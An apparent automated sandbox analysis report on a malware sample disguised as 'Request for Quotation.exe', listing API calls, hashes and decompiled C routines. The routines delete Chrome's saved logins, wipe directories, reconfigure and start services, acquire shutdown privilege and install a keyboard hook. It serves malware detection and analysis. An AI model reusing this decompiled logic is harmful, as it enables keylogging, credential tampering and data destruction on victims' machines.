                                                                                • Associated: 00000001.00000002.903223606.000000000041D000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$?c_str@?$basic_string@D@std@@$??1?$basic_string@$D@2@@std@@$??0?$basic_string@$??8std@@D@2@@0@G@1@@V?$basic_string@$??2@??3@?length@?$basic_string@DownloadExecuteFileShellV01@@free
                                                                                • String ID: C:\Users\user\Desktop\Request for Quotation.exe$open
                                                                                • API String ID: 2294739476-3163107129
                                                                                • Opcode ID: 116c612a25176188bdba456355ef9aa21b96b1dc395a3104552b31ad9d06bf76
                                                                                • Instruction ID: 66a65e8c2e1efbdbe9726922674a8fee4e6f9857a913e182205edf5cab11bea9
                                                                                • Opcode Fuzzy Hash: 116c612a25176188bdba456355ef9aa21b96b1dc395a3104552b31ad9d06bf76
                                                                                • Instruction Fuzzy Hash: BE416C7290011CABCB05ABE0EC999EE7778BB54355F44487AF912F30E1EE785A44CB68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000), ref: 00410153
                                                                                • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000001,6D195DF0), ref: 0041016E
                                                                                • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000), ref: 0041017F
                                                                                • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000001), ref: 0041018F
                                                                                • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000002), ref: 0041019F
                                                                                • StrToIntA.SHLWAPI(00000000), ref: 004101A6
                                                                                  • Part of subcall function 0040F5F4: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040F622
                                                                                  • Part of subcall function 0040F5F4: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041C0C8), ref: 0040F65F
                                                                                  • Part of subcall function 0040F5F4: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040F91A
                                                                                • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000), ref: 004101CC
                                                                                • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000002), ref: 004101DA
                                                                                • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000003), ref: 004101ED
                                                                                • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000004), ref: 00410200
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410347
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410350
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.903223606.000000000041D000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$A?$basic_string@$??1?$basic_string@$??0?$basic_string@?size@?$basic_string@?substr@?$basic_string@V01@@V12@
                                                                                • String ID:
                                                                                • API String ID: 1196022968-0
                                                                                • Opcode ID: 6ca50eb3e5ada92066c2d8b5a863bff046788870a4ac603b3f307b788a69b09c
                                                                                • Instruction ID: 7272514a8ba1597b194ef94dbad827cdd9e8fa084c1de8a91cbb274806fefa0c
                                                                                • Opcode Fuzzy Hash: 6ca50eb3e5ada92066c2d8b5a863bff046788870a4ac603b3f307b788a69b09c
                                                                                • Instruction Fuzzy Hash: C9614976840208EFCF01DFE4DC88AED7B75BB19300F0081A6E516A72B1DB785A99CF19
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,00000000), ref: 0040333B
                                                                                • FindFirstFileW.KERNEL32(00000000,?,?,00000000), ref: 00403342
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000000), ref: 00403379
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00415898,?,?,00000000), ref: 00403392
                                                                                • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(00000000,?,?,00000000), ref: 00403399
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 004033A6
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000250,?), ref: 004033C4
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004033CE
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004033D7
                                                                                • FindNextFileW.KERNEL32(?,?), ref: 004033ED
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000250,?), ref: 00403402
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00000000), ref: 00403411
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040341D
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403426
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040342F
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040344A
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000050), ref: 0040345F
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000054), ref: 00403468
                                                                                  • Part of subcall function 00412855: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412860
                                                                                  • Part of subcall function 00412855: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 0041286C
                                                                                  • Part of subcall function 00412855: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412876
                                                                                  • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                                                                  • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??0?$basic_string@??1?$basic_string@G@std@@$G@2@@std@@$D@1@@V01@@$??4?$basic_string@?c_str@?$basic_string@FileFindV01@V?$basic_string@$??9std@@?length@?$basic_string@D@2@@0@FirstG@1@@G@2@@0@Hstd@@NextV10@0@
                                                                                • String ID:
                                                                                • API String ID: 3638635289-0
                                                                                • Opcode ID: 50729e0f487a675d406b375c381a7b1e4c46741dfe175a948957291c48c150db
                                                                                • Instruction ID: 5773dbc557d9876992c7e48c4d97bf12bb9d98964626974f027bca1071927927
                                                                                • Opcode Fuzzy Hash: 50729e0f487a675d406b375c381a7b1e4c46741dfe175a948957291c48c150db
                                                                                • Instruction Fuzzy Hash: E641FB7290050DEBCB04ABA0DC49DEEBB7CEB94355F404166F512E30A0EF745689CB64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 32%
                                                                                			E0040710F() {
                                                                                				char _v5;
                                                                                				char _v6;
                                                                                				char _v24;
                                                                                				void* _v40;
                                                                                				char* _t12;
                                                                                				CHAR* _t13;
                                                                                				long _t20;
                                                                                				char* _t21;
                                                                                				void* _t25;
                                                                                
                                                                                				_t12 = getenv("UserProfile");
                                                                                				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t12,  &_v5, "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data");
                                                                                				_t13 =  &_v24;
                                                                                				L00414170();
                                                                                				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t13, _t12);
                                                                                				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                                                                				if(DeleteFileA(_t13) != 0) {
                                                                                					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v6);
                                                                                					E00407A90("\n[Chrome StoredLogins found, cleared!]");
                                                                                					_t25 = 1;
                                                                                					L8:
                                                                                					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                					return _t25;
                                                                                				}
                                                                                				_t20 = GetLastError();
                                                                                				if(_t20 == 0) {
                                                                                					_t21 =  &_v6;
                                                                                					L5:
                                                                                					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t21);
                                                                                					E00407A90("\n[Chrome StoredLogins not found]");
                                                                                					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                                                                					return 1;
                                                                                				}
                                                                                				if(_t20 == 1) {
                                                                                					_t21 =  &_v5;
                                                                                					goto L5;
                                                                                				}
                                                                                				_t25 = 0;
                                                                                				goto L8;
                                                                                			}













                                                                                APIs
                                                                                • getenv.MSVCRT ref: 00407124
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 0040712F
                                                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040713A
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407145
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040714E
                                                                                • DeleteFileA.KERNEL32(00000000), ref: 00407155
                                                                                • GetLastError.KERNEL32 ref: 0040715F
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Chrome StoredLogins not found],00000000), ref: 0040717E
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040718F
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Chrome StoredLogins found, cleared!],00000000), ref: 004071B1
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004071C4
                                                                                Strings
                                                                                • [Chrome StoredLogins not found], xrefs: 00407179
                                                                                • UserProfile, xrefs: 0040711F
                                                                                • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 00407119
                                                                                • [Chrome StoredLogins found, cleared!], xrefs: 004071AC
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.903223606.000000000041D000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@??1?$basic_string@D@1@@$?c_str@?$basic_string@D@2@@0@DeleteErrorFileHstd@@LastV10@V?$basic_string@getenv
                                                                                • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                                • API String ID: 3740952235-1062637481
                                                                                • Opcode ID: 14abc8a0a64898b0e6148fec52b2315570b0cd587dd224fa0db585d81b73ae0c
                                                                                • Instruction ID: 31ca8e98cb087ed4ee3b22d3c36486bbccf77f9584d8598ce9e7038f5dc1f740
                                                                                • Opcode Fuzzy Hash: 14abc8a0a64898b0e6148fec52b2315570b0cd587dd224fa0db585d81b73ae0c
                                                                                • Instruction Fuzzy Hash: 51118475904509EBCB00BBE0ED4E9FE7738DA547417504036E812E32E1EA796A45CBAA
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00412BEE(wchar_t* _a4) {
                                                                                				signed char _v5;
                                                                                				void* _v12;
                                                                                				short _v532;
                                                                                				long _v1052;
                                                                                				struct _WIN32_FIND_DATAW _v1644;
                                                                                				void* _t46;
                                                                                
                                                                                				wcscpy( &_v1052, _a4);
                                                                                				wcscat( &_v1052, L"\\*");
                                                                                				wcscpy( &_v532, _a4);
                                                                                				wcscat( &_v532, "\\");
                                                                                				_t46 = FindFirstFileW( &_v1052,  &_v1644);
                                                                                				_v12 = _t46;
                                                                                				if(_t46 == 0xffffffff) {
                                                                                					L18:
                                                                                					return 0;
                                                                                				}
                                                                                				wcscpy( &_v1052,  &_v532);
                                                                                				_v5 = 1;
                                                                                				do {
                                                                                					if(FindNextFileW(_v12,  &_v1644) == 0) {
                                                                                						if(GetLastError() != 0x12) {
                                                                                							L17:
                                                                                							FindClose(_v12);
                                                                                							goto L18;
                                                                                						}
                                                                                						_v5 = _v5 & 0x00000000;
                                                                                						goto L14;
                                                                                					}
                                                                                					if(E00412BBA( &(_v1644.cFileName)) != 0) {
                                                                                						goto L14;
                                                                                					}
                                                                                					wcscat( &_v532,  &(_v1644.cFileName));
                                                                                					if((_v1644.dwFileAttributes & 0x00000010) == 0) {
                                                                                						if((_v1644.dwFileAttributes & 0x00000001) != 0) {
                                                                                							SetFileAttributesW( &_v532, 0x80);
                                                                                						}
                                                                                						if(DeleteFileW( &_v532) == 0) {
                                                                                							goto L17;
                                                                                						} else {
                                                                                							L7:
                                                                                							wcscpy( &_v532,  &_v1052);
                                                                                							goto L14;
                                                                                						}
                                                                                					}
                                                                                					if(E00412BEE( &_v532) == 0) {
                                                                                						goto L17;
                                                                                					}
                                                                                					RemoveDirectoryW( &_v532);
                                                                                					goto L7;
                                                                                					L14:
                                                                                				} while (_v5 != 0);
                                                                                				FindClose(_v12);
                                                                                				return RemoveDirectoryW(_a4);
                                                                                			}










                                                                                APIs
                                                                                • wcscpy.MSVCRT ref: 00412C0A
                                                                                • wcscat.MSVCRT ref: 00412C1E
                                                                                • wcscpy.MSVCRT ref: 00412C2A
                                                                                • wcscat.MSVCRT ref: 00412C38
                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 00412C4B
                                                                                • wcscpy.MSVCRT ref: 00412C6B
                                                                                • FindNextFileW.KERNEL32(004085F5,?), ref: 00412C83
                                                                                • wcscat.MSVCRT ref: 00412CB4
                                                                                • wcscpy.MSVCRT ref: 00412CE9
                                                                                • SetFileAttributesW.KERNEL32(?,00000080), ref: 00412D04
                                                                                • DeleteFileW.KERNEL32(?), ref: 00412D11
                                                                                  • Part of subcall function 00412BEE: RemoveDirectoryW.KERNEL32(?), ref: 00412CD9
                                                                                • GetLastError.KERNEL32 ref: 00412D1D
                                                                                • FindClose.KERNEL32(004085F5), ref: 00412D39
                                                                                • RemoveDirectoryW.KERNEL32(004085F5), ref: 00412D42
                                                                                • FindClose.KERNEL32(004085F5), ref: 00412D4C
                                                                                  • Part of subcall function 00412BBA: wcscmp.MSVCRT ref: 00412BCC
                                                                                  • Part of subcall function 00412BBA: wcscmp.MSVCRT ref: 00412BDC
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: FileFindwcscpy$wcscat$CloseDirectoryRemovewcscmp$AttributesDeleteErrorFirstLastNext
                                                                                • String ID:
                                                                                • API String ID: 520940213-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 48%
                                                                                			E00411927(void* _a4, signed char _a20) {
                                                                                				short* _t6;
                                                                                				signed int _t9;
                                                                                				void* _t14;
                                                                                				short* _t17;
                                                                                				int _t19;
                                                                                				void* _t21;
                                                                                				void* _t22;
                                                                                
                                                                                				_t17 = 0;
                                                                                				_t6 = OpenSCManagerW(0, 0, 2);
                                                                                				_t22 = _t6;
                                                                                				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                                                                				_t21 = OpenServiceW(_t22, _t6, 2);
                                                                                				if(_t21 != 0) {
                                                                                					_t19 =  &_a4 | 0xffffffff;
                                                                                					_t9 = _a20 & 0x000000ff;
                                                                                					if(_t9 == 0) {
                                                                                						_push(4);
                                                                                						goto L8;
                                                                                					} else {
                                                                                						_t14 = _t9 - 1;
                                                                                						if(_t14 == 0) {
                                                                                							_push(2);
                                                                                							goto L8;
                                                                                						} else {
                                                                                							if(_t14 == 1) {
                                                                                								_push(3);
                                                                                								L8:
                                                                                								_pop(_t19);
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                					_t17 = _t17 & 0xffffff00 | ChangeServiceConfigW(_t21, 0xffffffff, _t19, 0xffffffff, _t17, _t17, _t17, _t17, _t17, _t17, _t17) != 0x00000000;
                                                                                					CloseServiceHandle(_t22);
                                                                                					CloseServiceHandle(_t21);
                                                                                				} else {
                                                                                					CloseServiceHandle(_t22);
                                                                                				}
                                                                                				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                                                                				return _t17;
                                                                                			}











                                                                                APIs
                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,Function_0001B310,?,?,00410FD9), ref: 00411933
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000002,?,?,00410FD9), ref: 00411940
                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,?,?,00410FD9), ref: 00411948
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,00410FD9), ref: 00411955
                                                                                • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00410FD9), ref: 00411986
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,00410FD9), ref: 00411998
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,00410FD9), ref: 0041199B
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,00410FD9), ref: 004119A0
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.903223606.000000000041D000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: Service$CloseHandle$G@2@@std@@G@std@@OpenU?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@ChangeConfigManager
                                                                                • String ID:
                                                                                • API String ID: 760094045-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 68%
                                                                                			E00411700(void* _a4) {
                                                                                				short* _t5;
                                                                                				signed int _t12;
                                                                                				void* _t15;
                                                                                				void* _t16;
                                                                                
                                                                                				_t12 = 0;
                                                                                				_t5 = OpenSCManagerW(0, 0, 0x10);
                                                                                				_t16 = _t5;
                                                                                				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
                                                                                				_t15 = OpenServiceW(_t16, _t5, 0x10);
                                                                                				if(_t15 != 0) {
                                                                                					_t12 = 0 | StartServiceW(_t15, 0, 0) != 0x00000000;
                                                                                					CloseServiceHandle(_t16);
                                                                                					CloseServiceHandle(_t15);
                                                                                				} else {
                                                                                					CloseServiceHandle(_t16);
                                                                                				}
                                                                                				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
                                                                                				return _t12;
                                                                                			}








                                                                                APIs
                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,Function_0001B310,?,?,0041130D), ref: 0041170C
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000010,?,?,0041130D), ref: 00411719
                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,?,?,0041130D), ref: 00411721
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,0041130D), ref: 0041172E
                                                                                • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,0041130D), ref: 00411739
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,0041130D), ref: 0041174B
                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,0041130D), ref: 0041174E
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,0041130D), ref: 00411753
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.903223606.000000000041D000.00000040.00000001.sdmp
                                                                                Similarity
                                                                                • API ID: Service$CloseHandle$G@2@@std@@G@std@@OpenU?$char_traits@V?$allocator@$??1?$basic_string@?c_str@?$basic_string@ManagerStart
                                                                                • String ID:
                                                                                • API String ID: 3595611540-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 84%
                                                                                			E0040EC0F() {
                                                                                				void* _v8;
                                                                                				intOrPtr _v12;
                                                                                				struct _TOKEN_PRIVILEGES _v24;
                                                                                				signed int _t14;
                                                                                
                                                                                				OpenProcessToken(GetCurrentProcess(), 0x28,  &_v8);
                                                                                				LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                                                                				_v24.PrivilegeCount = 1;
                                                                                				_v12 = 2;
                                                                                				AdjustTokenPrivileges(_v8, 0,  &_v24, 0, 0, 0);
                                                                                				_t14 = GetLastError();
                                                                                				asm("sbb eax, eax");
                                                                                				return  ~( ~_t14);
                                                                                			}








                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(00000028,?,0041B310,?,?,?,?,?,0040DF86), ref: 0040EC1C
                                                                                • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,0040DF86), ref: 0040EC23
                                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040EC35
                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0040EC54
                                                                                • GetLastError.KERNEL32 ref: 0040EC5A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                                • String ID: SeShutdownPrivilege
                                                                                • API String ID: 3534403312-3733053543
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00409D02(void** _a4) {
                                                                                				void* _t4;
                                                                                				long _t5;
                                                                                				struct HRSRC__* _t7;
                                                                                
                                                                                				_t7 = FindResourceA(0, "SETTINGS", 0xa);
                                                                                				_t4 = LockResource(LoadResource(0, _t7));
                                                                                				_t5 = SizeofResource(0, _t7);
                                                                                				 *_a4 = _t4;
                                                                                				return _t5;
                                                                                			}







                                                                                APIs
                                                                                • FindResourceA.KERNEL32(00000000,SETTINGS,0000000A), ref: 00409D10
                                                                                • LoadResource.KERNEL32(00000000,00000000,?,?,?,0040983C,00000000,?,?,00000000), ref: 00409D1B
                                                                                • LockResource.KERNEL32(00000000,?,?,?,0040983C,00000000,?,?,00000000), ref: 00409D22
                                                                                • SizeofResource.KERNEL32(00000000,00000000,?,?,?,0040983C,00000000,?,?,00000000), ref: 00409D2D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.903223606.000000000041D000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Resource$FindLoadLockSizeof
                                                                                • String ID: SETTINGS
                                                                                • API String ID: 3473537107-594951305
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0040532D(struct HHOOK__** _a4, int _a8, int _a12, void* _a16) {
                                                                                				void* _t19;
                                                                                				void* _t26;
                                                                                				struct HHOOK__** _t32;
                                                                                				signed int _t33;
                                                                                
                                                                                				_t32 = _a4;
                                                                                				_t33 = 5;
                                                                                				memcpy( &(_t32[0x10]), _a16, _t33 << 2);
                                                                                				if(_a8 == 0) {
                                                                                					_t19 = _a12 - 0x100;
                                                                                					if(_t19 == 0) {
                                                                                						if(GetKeyState(0x14) == 0 || GetKeyState(0x14) == 0xff80) {
                                                                                							_t32[0xb] = _t32[0xb] & 0x00000000;
                                                                                						} else {
                                                                                							_t32[0xb] = 1;
                                                                                						}
                                                                                						E00406BA7(_t32);
                                                                                						E00406BCB(_t32);
                                                                                						E00405EB2(_t32);
                                                                                						if(_t32[0xb] == 0) {
                                                                                							E00406952(_t32);
                                                                                						}
                                                                                						_t32[0xb] = _t32[0xb] & 0x00000000;
                                                                                					} else {
                                                                                						_t26 = _t19 - 1;
                                                                                						if(_t26 == 0) {
                                                                                							E00406BB9(_t32);
                                                                                							E00406BDD(_t32);
                                                                                							E00406B61(_t32);
                                                                                						} else {
                                                                                							if(_t26 == 3) {
                                                                                								E00406AD1(_t32);
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				return CallNextHookEx( *_t32, _a8, _a12, _a16);
                                                                                			}








                                                                                APIs
                                                                                • GetKeyState.USER32(00000014), ref: 00405381
                                                                                • GetKeyState.USER32(00000014), ref: 0040538A
                                                                                  • Part of subcall function 00406AD1: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415D38,?), ref: 00406B51
                                                                                • CallNextHookEx.USER32 ref: 004053CD
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.903223606.000000000041D000.00000040.00000001.sdmp
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: StateV?$allocator@$??0?$basic_string@CallD@1@@D@2@@std@@D@std@@HookNextU?$char_traits@
                                                                                • String ID:
                                                                                • API String ID: 98962008-0
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E00405156(void* __ecx) {
                                                                                				signed int _t3;
                                                                                				signed int _t4;
                                                                                				intOrPtr _t6;
                                                                                				intOrPtr _t7;
                                                                                				void* _t8;
                                                                                
                                                                                				_t8 = __ecx;
                                                                                				_t3 = GetKeyboardLayout(0);
                                                                                				_t4 = _t3 & 0x000003ff;
                                                                                				_t6 = 9;
                                                                                				if(_t4 == _t6) {
                                                                                					L3:
                                                                                					 *((intOrPtr*)(_t8 + 0x38)) = _t6;
